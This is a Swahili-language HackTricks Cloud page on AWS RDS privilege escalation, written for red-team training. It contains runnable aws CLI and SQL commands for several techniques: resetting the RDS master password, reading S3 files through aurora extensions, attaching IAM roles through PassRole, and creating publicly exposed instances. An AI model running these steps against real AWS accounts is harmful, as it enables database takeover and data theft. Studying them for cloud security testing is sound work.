AWS - RDS Privesc

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mipango ya usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud github repos.

RDS - Relational Database Service

Kwa maelezo zaidi kuhusu RDS angalia:

AWS - Relational Database (RDS) Enum

`rds:ModifyDBInstance`

Kwa ruhusa hiyo mshambuliaji anaweza kubadilisha nenosiri la mtumiaji mkuu, na kuingia ndani ya hifadhidata:

# Get the DB username, db name and address
aws rds describe-db-instances

# Modify the password and wait a couple of minutes
aws rds modify-db-instance \
--db-instance-identifier <db-id> \
--master-user-password 'Llaody2f6.123' \
--apply-immediately

# In case of postgres
psql postgresql://<username>:<pass>@<rds-dns>:5432/<db-name>

Utahitaji kuwa na uwezo wa kuwasiliana na database (kawaida zinapatikana tu kutoka ndani ya mitandao).

Athari Zingine: Pata taarifa nyeti ndani ya databases.

rds-db:connect

Kulingana na docs mtumiaji mwenye ruhusa hii anaweza kuungana na DB instance.

Kudhalilisha RDS Role IAM ruhusa

Postgresql (Aurora)

Ikiwa unaendesha SELECT datname FROM pg_database; na unapata database inayoitwa rdsadmin unajua uko ndani ya AWS postgresql database.

Kwanza unaweza kuangalia kama database hii imetumika kufikia huduma nyingine yoyote ya AWS. Unaweza kuangalia hili kwa kuangalia extensions zilizowekwa:

SELECT * FROM pg_extension;

Ikiwa utapata kitu kama aws_s3 unaweza kudhani kuwa hifadhidata hii ina aina fulani ya ufikiaji juu ya S3 (kuna viendelezi vingine kama aws_ml na aws_lambda).

Pia, ikiwa una ruhusa za kuendesha aws rds describe-db-clusters unaweza kuona pale kama klasta ina IAM Role yoyote iliyounganishwa katika sehemu ya AssociatedRoles. Ikiwa ipo, unaweza kudhani kuwa hifadhidata ilitayarishwa kupata huduma zingine za AWS. Kulingana na jina la role (au ikiwa unaweza kupata ruhusa za role) unaweza kudhani ni ufikiaji gani wa ziada hifadhidata inayo.

Sasa, ili kusoma faili ndani ya ndoo unahitaji kujua njia kamili. Unaweza kuisoma na:

// Create table
CREATE TABLE ttemp (col TEXT);

// Create s3 uri
SELECT aws_commons.create_s3_uri(
'test1234567890678', // Name of the bucket
'data.csv',          // Name of the file
'eu-west-1'          //region of the bucket
) AS s3_uri \gset

// Load file contents in table
SELECT aws_s3.table_import_from_s3('ttemp', '', '(format text)',:'s3_uri');

// Get info
SELECT * from ttemp;

// Delete table
DROP TABLE ttemp;

Ikiwa ulikuwa na raw AWS credentials ungeweza pia kuzitumia kufikia data za S3 na:

SELECT aws_s3.table_import_from_s3(
't', '', '(format csv)',
:'s3_uri',
aws_commons.create_aws_credentials('sample_access_key', 'sample_secret_key', '')
);

Postgresql haitaji kubadilisha kigezo chochote cha kundi ili kuweza kufikia S3.

Mysql (Aurora)

Ndani ya mysql, ukikimbia swali SELECT User, Host FROM mysql.user; na kuna mtumiaji anayeitwa rdsadmin, unaweza kudhani uko ndani ya AWS RDS mysql db.

Ndani ya mysql kimbia show variables; na kama vigezo kama aws_default_s3_role, aurora_load_from_s3_role, aurora_select_into_s3_role, vina thamani, unaweza kudhani database imeandaliwa kufikia data za S3.

Pia, kama una ruhusa za kukimbia aws rds describe-db-clusters unaweza kuangalia kama cluster ina associated role, ambayo kawaida inamaanisha kufikia huduma za AWS).

Sasa, ili kusoma faili ndani ya bucket unahitaji kujua njia kamili. Unaweza kuisoma na:

CREATE TABLE ttemp (col TEXT);
LOAD DATA FROM S3 's3://mybucket/data.txt' INTO TABLE ttemp(col);
SELECT * FROM ttemp;
DROP TABLE ttemp;

`rds:AddRoleToDBCluster`, `iam:PassRole`

Mshambuliaji mwenye ruhusa za rds:AddRoleToDBCluster na iam:PassRole anaweza kuongeza jukumu maalum kwenye RDS instance iliyopo. Hii inaweza kumruhusu mshambuliaji kupata data nyeti au kubadilisha data ndani ya instance.

aws add-role-to-db-cluster --db-cluster-identifier <value> --role-arn <value>

Potential Impact: Upatikanaji wa data nyeti au marekebisho yasiyoidhinishwa ya data katika RDS instance. Kumbuka kuwa baadhi ya DBs zinahitaji mipangilio ya ziada kama Mysql, ambayo inahitaji kubainisha role ARN katika aprameter groups pia.

`rds:CreateDBInstance`

Kwa ruhusa hii tu, mshambuliaji anaweza kuunda instance mpya ndani ya cluster ambayo tayari ipo na ina IAM role iliyounganishwa. Hataweza kubadilisha nenosiri la mtumiaji mkuu, lakini anaweza kufichua instance mpya ya database kwa mtandao:

aws --region eu-west-1 --profile none-priv rds create-db-instance \
--db-instance-identifier mydbinstance2 \
--db-instance-class db.t3.medium \
--engine aurora-postgresql \
--db-cluster-identifier database-1 \
--db-security-groups "string" \
--publicly-accessible

`rds:CreateDBInstance`, `iam:PassRole`

TODO: Test

Mshambuliaji mwenye ruhusa za rds:CreateDBInstance na iam:PassRole anaweza kuunda RDS instance mpya na jukumu maalum lililounganishwa. Mshambuliaji anaweza kisha kupata data nyeti au kubadilisha data ndani ya instance.

Baadhi ya mahitaji ya jukumu/instance-profile ya kuunganisha (kutoka hapa):

Profaili lazima iwepo kwenye akaunti yako.
Profaili lazima iwe na jukumu la IAM ambalo Amazon EC2 ina ruhusa za kuchukua.
Jina la instance profile na jina la jukumu la IAM linalohusiana lazima lianze na kiambishi AWSRDSCustom.

aws rds create-db-instance --db-instance-identifier malicious-instance --db-instance-class db.t2.micro --engine mysql --allocated-storage 20 --master-username admin --master-user-password mypassword --db-name mydatabase --vapc-security-group-ids sg-12345678 --db-subnet-group-name mydbsubnetgroup --enable-iam-database-authentication --custom-iam-instance-profile arn:aws:iam::123456789012:role/MyRDSEnabledRole

Potential Impact: Upatikanaji wa data nyeti au marekebisho yasiyoidhinishwa ya data katika RDS instance.

`rds:AddRoleToDBInstance`, `iam:PassRole`

Mshambuliaji mwenye ruhusa za rds:AddRoleToDBInstance na iam:PassRole anaweza kuongeza jukumu maalum kwenye RDS instance iliyopo. Hii inaweza kumruhusu mshambuliaji kupata data nyeti au kurekebisha data ndani ya instance.

DB instance lazima iwe nje ya cluster kwa hili

aws rds add-role-to-db-instance --db-instance-identifier target-instance --role-arn arn:aws:iam::123456789012:role/MyRDSEnabledRole --feature-name <feat-name>

Potential Impact: Upatikanaji wa data nyeti au marekebisho yasiyoidhinishwa ya data katika RDS instance.

Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mipango ya usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud repos za github.

PreviousAWS - MSK Privesc NextAWS - Redshift Privesc

Last updated 1 month ago

RDS - Relational Database Service

rds:ModifyDBInstance

rds-db:connect

Kudhalilisha RDS Role IAM ruhusa

Postgresql (Aurora)

Mysql (Aurora)

rds:AddRoleToDBCluster, iam:PassRole

rds:CreateDBInstance

rds:CreateDBInstance, iam:PassRole

rds:AddRoleToDBInstance, iam:PassRole

`rds:ModifyDBInstance`

`rds:AddRoleToDBCluster`, `iam:PassRole`

`rds:CreateDBInstance`

`rds:CreateDBInstance`, `iam:PassRole`

`rds:AddRoleToDBInstance`, `iam:PassRole`